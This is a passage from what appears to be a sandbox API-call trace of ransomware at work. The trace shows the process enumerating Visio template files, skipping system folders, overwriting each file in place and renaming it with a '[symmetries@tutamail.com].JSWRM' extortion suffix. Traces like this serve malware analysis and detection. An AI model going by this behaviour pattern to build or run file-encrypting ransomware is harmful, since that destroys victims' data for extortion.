lpOverlapped=0x0) returned 1 [0145.471] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.471] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0145.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0145.472] CloseHandle (hObject=0x314) returned 1 [0145.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0145.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0145.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0145.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0145.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0145.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0145.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0145.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0145.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0145.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0145.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0145.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0145.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0145.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0145.473] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0145.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0145.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0145.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0145.475] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49acf59, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49acf59, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49acf59, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xc73b, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BPMN_M.VSTX", cAlternateFileName="BPMN_M~1.VST")) returned 1 [0145.475] lstrcmpiW (lpString1="BPMN_M.VSTX", lpString2=".") returned 1 [0145.475] lstrcmpiW (lpString1="BPMN_M.VSTX", lpString2="..") returned 1 [0145.475] lstrcmpiW (lpString1="BPMN_M.VSTX", lpString2="...") returned 1 [0145.475] lstrcmpiW (lpString1="BPMN_M.VSTX", lpString2="windows") returned -1 [0145.475] lstrcmpiW (lpString1="BPMN_M.VSTX", lpString2="recovery") returned -1 [0145.475] lstrcmpiW (lpString1="BPMN_M.VSTX", lpString2="perflogs") returned -1 [0145.475] lstrcmpiW (lpString1="BPMN_M.VSTX", lpString2="documents and settings") returned -1 [0145.475] lstrcmpiW (lpString1="BPMN_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0145.475] lstrcmpiW (lpString1="BPMN_M.VSTX", lpString2="system volume information") returned -1 [0145.475] lstrcmpiW (lpString1="BPMN_M.VSTX", lpString2="msocache") returned -1 [0145.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0145.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_M.VSTX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0145.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_M.VSTX", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BPMN_M.VSTX", lpUsedDefaultChar=0x0) returned 11 [0145.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0145.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0145.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_M.VSTX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0145.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_M.VSTX", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BPMN_M.VSTX", lpUsedDefaultChar=0x0) returned 11 [0145.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0145.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0145.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0145.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0145.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0145.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0145.476] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0145.478] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=51003) returned 1 [0145.478] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc730) returned 0x27b348 [0145.479] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xc730, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xc730, lpOverlapped=0x0) returned 1 [0145.499] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.499] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xc730, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xc730, lpOverlapped=0x0) returned 1 [0145.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0145.501] CloseHandle (hObject=0x314) returned 1 [0145.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0145.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0145.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0145.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0145.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0145.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0145.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0145.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0145.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0145.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0145.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0145.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0145.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0145.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0145.501] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0145.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0145.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0145.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0145.503] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49acf59, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49acf59, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49acf59, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x1b369, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BPMN_PROCESS_GATEWAY_M.VSTX", cAlternateFileName="BPMN_P~1.VST")) returned 1 [0145.503] lstrcmpiW (lpString1="BPMN_PROCESS_GATEWAY_M.VSTX", lpString2=".") returned 1 [0145.503] lstrcmpiW (lpString1="BPMN_PROCESS_GATEWAY_M.VSTX", lpString2="..") returned 1 [0145.503] lstrcmpiW (lpString1="BPMN_PROCESS_GATEWAY_M.VSTX", lpString2="...") returned 1 [0145.503] lstrcmpiW (lpString1="BPMN_PROCESS_GATEWAY_M.VSTX", lpString2="windows") returned -1 [0145.503] lstrcmpiW (lpString1="BPMN_PROCESS_GATEWAY_M.VSTX", lpString2="recovery") returned -1 [0145.503] lstrcmpiW (lpString1="BPMN_PROCESS_GATEWAY_M.VSTX", lpString2="perflogs") returned -1 [0145.503] lstrcmpiW (lpString1="BPMN_PROCESS_GATEWAY_M.VSTX", lpString2="documents and settings") returned -1 [0145.503] lstrcmpiW (lpString1="BPMN_PROCESS_GATEWAY_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0145.503] lstrcmpiW (lpString1="BPMN_PROCESS_GATEWAY_M.VSTX", lpString2="system volume information") returned -1 [0145.503] lstrcmpiW (lpString1="BPMN_PROCESS_GATEWAY_M.VSTX", lpString2="msocache") returned -1 [0145.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0145.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_PROCESS_GATEWAY_M.VSTX", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0145.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0145.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_PROCESS_GATEWAY_M.VSTX", cchWideChar=27, lpMultiByteStr=0x240fe8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BPMN_PROCESS_GATEWAY_M.VSTX", lpUsedDefaultChar=0x0) returned 27 [0145.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0145.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0145.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_PROCESS_GATEWAY_M.VSTX", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0145.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0145.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_PROCESS_GATEWAY_M.VSTX", cchWideChar=27, lpMultiByteStr=0x2410d8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BPMN_PROCESS_GATEWAY_M.VSTX", lpUsedDefaultChar=0x0) returned 27 [0145.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0145.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0145.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0145.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0145.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0145.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0145.503] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_PROCESS_GATEWAY_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_process_gateway_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0145.504] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=111465) returned 1 [0145.504] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1b360) returned 0x2501e8 [0145.505] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1b360, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x1b360, lpOverlapped=0x0) returned 1 [0145.528] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.528] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1b360, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x1b360, lpOverlapped=0x0) returned 1 [0145.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0145.530] CloseHandle (hObject=0x314) returned 1 [0145.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0145.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0145.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0145.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0145.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0145.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0145.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0145.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0145.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0145.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0145.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0145.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x24f9b8 [0145.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0145.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0145.530] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_PROCESS_GATEWAY_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_process_gateway_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_PROCESS_GATEWAY_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_process_gateway_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0145.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f9b8 | out: hHeap=0x1e0000) returned 1 [0145.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0145.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0145.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0145.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0145.532] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49acf59, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49acf59, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49acf59, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x1aa7e, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BPMN_PROCESS_GATEWAY_U.VSTX", cAlternateFileName="BPMN_P~2.VST")) returned 1 [0145.532] lstrcmpiW (lpString1="BPMN_PROCESS_GATEWAY_U.VSTX", lpString2=".") returned 1 [0145.533] lstrcmpiW (lpString1="BPMN_PROCESS_GATEWAY_U.VSTX", lpString2="..") returned 1 [0145.533] lstrcmpiW (lpString1="BPMN_PROCESS_GATEWAY_U.VSTX", lpString2="...") returned 1 [0145.533] lstrcmpiW (lpString1="BPMN_PROCESS_GATEWAY_U.VSTX", lpString2="windows") returned -1 [0145.533] lstrcmpiW (lpString1="BPMN_PROCESS_GATEWAY_U.VSTX", lpString2="recovery") returned -1 [0145.533] lstrcmpiW (lpString1="BPMN_PROCESS_GATEWAY_U.VSTX", lpString2="perflogs") returned -1 [0145.533] lstrcmpiW (lpString1="BPMN_PROCESS_GATEWAY_U.VSTX", lpString2="documents and settings") returned -1 [0145.533] lstrcmpiW (lpString1="BPMN_PROCESS_GATEWAY_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0145.533] lstrcmpiW (lpString1="BPMN_PROCESS_GATEWAY_U.VSTX", lpString2="system volume information") returned -1 [0145.533] lstrcmpiW (lpString1="BPMN_PROCESS_GATEWAY_U.VSTX", lpString2="msocache") returned -1 [0145.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0145.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_PROCESS_GATEWAY_U.VSTX", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0145.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0145.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_PROCESS_GATEWAY_U.VSTX", cchWideChar=27, lpMultiByteStr=0x2413a8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BPMN_PROCESS_GATEWAY_U.VSTX", lpUsedDefaultChar=0x0) returned 27 [0145.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0145.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0145.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_PROCESS_GATEWAY_U.VSTX", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0145.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0145.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BPMN_PROCESS_GATEWAY_U.VSTX", cchWideChar=27, lpMultiByteStr=0x2410d8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BPMN_PROCESS_GATEWAY_U.VSTX", lpUsedDefaultChar=0x0) returned 27 [0145.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0145.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0145.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0145.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0145.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0145.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0145.533] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPMN_PROCESS_GATEWAY_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpmn_process_gateway_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0145.534] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=109182) returned 1 [0145.534] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1aa70) returned 0x2501e8 [0145.535] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1aa70, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x1aa70, lpOverlapped=0x0) returned 1 [0145.560] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.561] WriteFile (in: hFile=0x314, 